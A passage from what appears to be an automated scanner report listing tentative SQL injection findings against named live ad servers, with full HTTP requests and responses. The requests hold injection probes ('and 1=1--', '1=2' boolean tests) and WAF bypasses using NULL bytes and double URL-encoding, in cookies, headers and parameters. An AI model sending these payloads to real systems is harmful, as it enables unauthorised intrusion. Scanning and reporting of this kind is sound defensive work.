GET /imp?Z=300x250&atf=1'%20and%201%3d2--%20&brw=cr3&efo=0&os=wn7&pfm=1&prm=0&rtg=ga&s=1782250&tlfs=ch&tmen=ch&tphv=ch&uatRandNo=65268&_salt=4187966827&B=10&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response 2

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:38 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0328.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Sun, 02 Oct 2011 23:53:38 GMT
Pragma: no-cache
Content-Length: 1814
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<script type=\'text/javascript\' src=\'http://ad.turn.com/server/ads.js?pub=5757440&cch=5766809&code=5766822&l=300x250&aid=26676525&ahcid=1883426&bimpd=fOK9nK5SBPNMFPSaVcmC2Wth1-bS6WqeAcIEhmtqe7rT8nINU3UZBQr9rcUhUA1N8cRt7-4qdvT1s921wLY5MvhJQY3n5aB8LYFmoY1scYnkOuPr29GBwJEIlGIG8y6-woDPCiqPiV08NCy4UXORWW1HcKcIB-ji-YZznvV7YFbW-jz71YgLww7DGj5OXU14HnxF-CcwsJXwWAOdYeKznq8McqEAK-UmBlv3IIWyyUO3ZdHjZdUsAV-ly2h2S3imgukhFY036-UAkYbmGxOKupGFftJkIqwH9qF07DFDjClZLvv9Fj99WkgUM3N7Pk3wJLXqTBYYrDYXzyLBoFAQjyLsKli7c3srR59_w2uApkZ4zOGxFlgqKMqOcLjGPeXul1BZwhrGK9kkKqWo_4Vc0HttRxMG_MxGL8BOWn5BaTgxnIpfRe_0nV8j-2uLFEcHGnNxk5QAcyrq8hS2PQWsGSRN6cjv64iyAUwjrCV62Z4kNWUS9C6pnmY7wyLcrDnG_9FK7pAJgs0CD0PsBjgu6xrB2q8vsB_pWw7eofVu65DMN8BETOKrAOkHaet0vXqwvfBz5xDsVEqchMpjM7fNhX3cv0bkaM0JpYmODU6vGPfofQ9TH1f1BuQDNWHQYeRUvzvm_C2gw3LCUGFlwKflrjU51HHY789nG4erhkB4WPhneywnUNb5R3ghoDZMAUmq5ZT6ApQ0N3A9ksY0B-eLzmL0jJk7x81x1HM4Bl65LQheFkuieZwAC6g7llKdWa2iLK1EaGuwAlEPUKyOoDOQbdT_c9SK2zNgw7l2BpfGmhLu_A45Cp_byU6Eng9JHpJukR3NLoNbrFznL6rSwUDyDC730X_TxHXAuaaB6eh8srs&sli=3154796&bli=2900475&exPub=425670&acp=0.0088&3c=http%3A%2F%2Fad%2Etechnoratimedia%2Ecom%2Fclk%3F3%2CeAGVTstugzAQ%2EBpuyAKbp1APTgwREY%2EQorbhgsA2IiU85FAF8fW1GtqeO1ppR7M7s6sjz9JhI0G5SRG1a%2DjpCFJb45VBXVXzPA%2DatmEgzXVt9RbuGE7H5XAnzhBm%2DBvE0n8oxsTBWfjQTw4GdwKAWbxHDwXX%2D%2Ei%2DmezsZaPb7H%2DNuM2zv1nkvS3qZGXpsoa736zDsU9Wfy0%2Dimv09toluT%2EHeXCN95qZkGMX5dQoctbF%2DXlJJT%2E%2EvfSkqu08TwrCCgxkMTCLivEFjBMfFkDHXopVI8DUyqVgHQd%2DYQoiFnJ1BVq0lvwy3LiYS1ENbOzL4bOvuShbLvgXrFBuYw%3D%3D%2C&url=http%3A%2F%2Fd%2Etradex%2Eopenx%2Ecom%2Fafr%2Ephp%3Fzoneid%3D6391%26cb%3Dinsert%5Frandom%5Fnumber%5Fhere\'></script>');
var rm_data = new Object();
rm_data.creative_id = 8690940;
rm_data.offer_type = 3;
rm_data.entity_id = 424978;
if (window.rm_crex_data) {rm_crex_data.push(8690940);}
1.2. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH [JEB2 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH

Issue detail

The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID%00'; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18961

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2812308(i) {
var sVersion_2812308 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID%00''; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 592

document.write("\n");
var cb = Math.random();
var d = document;
var iframe = "&fr=" + (window != top);
var ref = "";
try {
if (window != top) {
ref = "&rf="+escape(d.referrer);
}
} catch (ignore) { }

...[SNIP]...
1.3. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH%2527;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18950

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2812308(i) {
var sVersion_2812308 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2812308%7C0%7C170%7CADTECH%2527%2527;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599331799 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 426

document.write("<scr"+"ipt src=\"http://tag.contextweb.com/TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=538936&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=106934\">\n");
docum
...[SNIP]...
1.4. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18961

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816967(i) {
var sVersion_2816967 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1712

document.write("<scr"+"ipt type='text/javascript'>//<![CDATA[\n");
document.write("document.MAX_ct0 ='';\n");
document.write("var m3_u = (location.protocol=='https:'?'https://cas.criteo.com/delivery/a
...[SNIP]...
1.5. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1%00'
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18950

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816967(i) {
var sVersion_2816967 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816967%7C0%7C168%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599353462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1%00''
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 475

document.write('<a href="http://adserver.adtech.de/?adlink|327|2816967|0|168|AdId=6109713;BnId=3;itime=599414338;sub1=[subst];" target=_blank><img src="http://aka-cdn-ns.adtech.de/images/17/Ad6109713S
...[SNIP]...
1.6. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH [JEB2 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH

Issue detail

The JEB2 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JEB2 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID'; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18902

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
teln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_2816968(i) {
var sVersion_2816968 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID''; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 1710

document.write("<scr"+"ipt type='text/javascript'>//<![CDATA[\n");
document.write("document.MAX_ct0 ='';\n");
document.write("var m3_u = (location.protocol=='https:'?'https://cas.criteo.com/delivery/a
...[SNIP]...
1.7. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH

Issue detail

The loc parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the loc parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982'%20and%201%3d1--%20 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18913

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ion\")\r\n"+
"end if";
window.execScript(sVersion_2816968, "VBScript");
return swVersion_;
}
var AT_MULTICLICK=new Array;
var AT_MULTICOUNT=new Array;
var AT_CLICKVAR=new Array;
var AT_CLICK = "http://store.nike.com/gb/en_gb/?l=shop,pdp,ctr-inline/cid-300/pid-406900&cp=EUNS_OT_FBJUL11_UK6";
var AT_IMGCLICK="";
var AT_TARGET="_blank";
var AT_MICROSITE=""; // width=xxx height=yyy
AT_MULTICLICK[1]="";
AT_MULTICLICK[2]="";
AT_MULTICLICK[3]="";
AT_MULTICLICK[4]="";
AT_MULTICLICK[5]="";
AT_MULTICLICK[6]="";
AT_MULTICLICK[7]="";
AT_MULTICLICK[8]="";
AT_MULTICLICK[9]="";
AT_CLICKVAR[0]="clickTAG";
AT_CLICKVAR[1]="clickTAG1";
AT_CLICKVAR[2]="clickTAG2";
AT_CLICKVAR[3]="clickTAG3";
AT_CLICKVAR[4]="clickTAG4";
AT_CLICKVAR[5]="clickTAG5";
AT_CLICKVAR[6]="clickTAG6";
AT_CLICKVAR[7]="clickTAG7";
AT_CLICKVAR[8]="clickTAG8";
AT_CLICKVAR[9]="clickTAG9";
AT_MULTICOUNT[1]="";
var AT_WIDTH_HEIGHT="width=468 height=60";
var AT_FLASH="http://aka-cdn-ns.adtech.de/apps/20/Ad6109716St3Sz1Sq100956575V1Id13/NikeSeitiroUK_468x60.swf";
var AT_TRANSPARENT=false;
var AT_FLASHVERSION=8;
var AT_FLASH_BGCOLOR="";
var AT_FlaQual="autohigh";
var AT_FlashClick=false;
var AT_LAYERMANUALRESIZE = false;
var AT_BASE="http://aka-cdn-ns.adtech.de/apps/20/Ad6109716St3Sz1Sq100956575V1Id13/"; // Nachladepfad fuer Flash Filme (http://.../)
var AT_IMAGE="http://aka-cdn-ns.adtech.de/apps/20/Ad6109716St3Sz1Sq100956575V1Id13/NikeSeitiroUk_468x60.gif";
var AT_TEXT="";
var AT_ALTIMAGEWIDTH = "468";
var AT_ALTIMAGEHEIGHT = "60";
var AT_ZINDEX = "0";
var AT_WMODE = "opaque";
var AT_EXPANDABLE="false"; // width:100px;height:70px; Zus?tzlich Fakepopup an position 0x0 machen
var AT_FAKEPOPUP=false;
var AT_FAKEPOPUP_left=100;
var AT_FAKEPOPUP_top=100;
var AT_FAKEPOPUP_autoclose='';
var AT_FAKEPOPUP_start_opened=true;
var AT_CURRENTDOMAIN= window.location.host;
var AT_VARSTRING;
//make variable names unique on page
var AT_MULTICLICK2816968=AT_MULTICLICK;
var AT_CLICK2816968=AT_CLICK;
var AT_TARGET2816968=AT_TARGET;
var AT_IMGCLICK2816968=AT_IMGCLICK;
AT_CLICKVAR[0]=AT_CLICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|327|2816968|
...[SNIP]...

Request 2

GET /addyn%7C3.0%7C327%7C2816968%7C0%7C1%7CADTECH;loc=100;target=_blank;sub1=[subst];grp=[group];misc=1317599345982'%20and%201%3d2--%20 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 18902

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ion\")\r\n"+
"end if";
window.execScript(sVersion_2816968, "VBScript");
return swVersion_;
}
var AT_MULTICLICK=new Array;
var AT_MULTICOUNT=new Array;
var AT_CLICKVAR=new Array;
var AT_CLICK = "http://www.barclays.co.uk/footballoffset";
var AT_IMGCLICK="";
var AT_TARGET="_blank";
var AT_MICROSITE=""; // width=xxx height=yyy
AT_MULTICLICK[1]="";
AT_MULTICLICK[2]="";
AT_MULTICLICK[3]="";
AT_MULTICLICK[4]="";
AT_MULTICLICK[5]="";
AT_MULTICLICK[6]="";
AT_MULTICLICK[7]="";
AT_MULTICLICK[8]="";
AT_MULTICLICK[9]="";
AT_CLICKVAR[0]="clickTAG";
AT_CLICKVAR[1]="clickTAG1";
AT_CLICKVAR[2]="clickTAG2";
AT_CLICKVAR[3]="clickTAG3";
AT_CLICKVAR[4]="clickTAG4";
AT_CLICKVAR[5]="clickTAG5";
AT_CLICKVAR[6]="clickTAG6";
AT_CLICKVAR[7]="clickTAG7";
AT_CLICKVAR[8]="clickTAG8";
AT_CLICKVAR[9]="clickTAG9";
AT_MULTICOUNT[1]="";
var AT_WIDTH_HEIGHT="width=468 height=60";
var AT_FLASH="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz1Sq101119312V0Id115/OffsetMortgage_route1_468x60_v4.swf";
var AT_TRANSPARENT=false;
var AT_FLASHVERSION=8;
var AT_FLASH_BGCOLOR="";
var AT_FlaQual="autohigh";
var AT_FlashClick=false;
var AT_LAYERMANUALRESIZE = false;
var AT_BASE="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz1Sq101119312V0Id115/"; // Nachladepfad fuer Flash Filme (http://.../)
var AT_IMAGE="http://aka-cdn-ns.adtech.de/apps/14/Ad6109710St3Sz1Sq101119312V0Id115/OffsetMortgage_route1_468x60_Backup.gif";
var AT_TEXT="";
var AT_ALTIMAGEWIDTH = "468";
var AT_ALTIMAGEHEIGHT = "60";
var AT_ZINDEX = "0";
var AT_WMODE = "opaque";
var AT_EXPANDABLE="false"; // width:100px;height:70px; Zus?tzlich Fakepopup an position 0x0 machen
var AT_FAKEPOPUP=false;
var AT_FAKEPOPUP_left=100;
var AT_FAKEPOPUP_top=100;
var AT_FAKEPOPUP_autoclose='';
var AT_FAKEPOPUP_start_opened=true;
var AT_CURRENTDOMAIN= window.location.host;
var AT_VARSTRING;
//make variable names unique on page
var AT_MULTICLICK2816968=AT_MULTICLICK;
var AT_CLICK2816968=AT_CLICK;
var AT_TARGET2816968=AT_TARGET;
var AT_IMGCLICK2816968=AT_IMGCLICK;
AT_CLICKVAR[0]=AT_CLICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtech.de/adlink|327|2816968|0|1|AdId=6109710;BnId=115;
...[SNIP]...
1.8. http://adserver.adtech.de/addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C327%7C2816969%7C0%7C170%7CADTECH

Issue detail

